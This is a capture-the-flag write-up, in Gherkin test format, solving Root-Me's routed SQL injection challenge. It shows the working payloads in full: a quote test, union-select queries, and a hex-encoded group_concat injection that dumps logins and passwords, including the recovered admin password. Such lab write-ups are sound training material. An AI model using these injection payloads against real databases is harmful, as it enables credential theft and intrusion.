## Version 2.0
## language: en

Feature: Web server-rootme
  Site:
    www.root-me.org
  Category:
    Web server
  User:
    dianaosorio97
  Goal:
    Find the admin password

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | kali-rolling    | 2019.1      |
    | Mozilla Firefox | 64.4.0      |
  Machine information:
    Given I am accessing the following link
    """
    https://www.root-me.org/es/Challenges/Web-Servidor
    /SQL-Injection-Routed
    """
    And I see the problem statement
    """
    Find the admin password
    """
    Then I selected the challenge button to start
    And The page redirects me to the following link
    """
    http://challenge01.root-me.org/web-serveur/ch49/
    """
    And I see a form to login
    Then I see a form to search user
    And I send the admin name
    And I see the following output
    """
    Results
    [+] Requested login: admin
    [+] Found ID: 3
    [+] Email: admin@sqli_me.com
    """
  Scenario: Fail: Using command select
    Given I am logged in the machine
    And I selected the option search
    Then I try verify if it's vuln to sql injection
    And I insert a single quote
    And I get the following output
    """
    You have an error in your SQL syntax; check the manual that
    corresponds to your MySQL server version for the right
    syntax to use near ''''' at line 1
    """
    Then I use union select to get information about the tables
    """
    ' select union 1 -- -
    """
    And I get the following result
    """
    [+] Requested login: ' union select 1 -- -
    [+] Found ID: 1
    [+] Email: jean@sqli_me.com
    """
    Then I try insert the select query
    """
    select login, password from users
    """
    And I use a web tool to encode the query
    """
    https://codebeautify.org/string-hex-converter
    """
    And I get the following result to insert
    """
    ' union select 0x2720756e696f6e2073656c65637420312c202
    773656c656374206c6f67696e2c2070617373776f72642066726f6
    d207573657273202d2d202d -- - -- -
    """
    And I insert it in the text field
    But This doesn't work
    """
    [+] Found ID: 1
    [+] Email: select login, password from users -- -
    """

  Scenario: Success: Using group_concat
    Given I am logged in the machine
    And I selected the option search
    And I insert the following payload using group_concat
    """
    ' union select 1, group_concat(login, password) from users -- -
    """
    And I encoded in hex the payload
    """
    2720756e696f6e2073656c65637420312c2067726f75705f636f6e636174
    286c6f67696e2c2070617373776f7264292066726f6d207573657273202d
    2d202d
    """
    And I send the injection
    """
    ' union select 0x2720756e696f6e2073656c65637420312c2067726f75
    705f636f6e636174286c6f67696e2c2070617373776f7264292066726f6d20
    7573657273202d2d202d -- -
    """
    And I get the following output
    """
    Results
    [+] Found ID: 1
    [+] Email: adminqs89QdAs9A,jeansuperpass,michelmypass
    """
    And I get the pass from admin
    """
    qs89QdAs9A
    """
    Then I solve the challenge
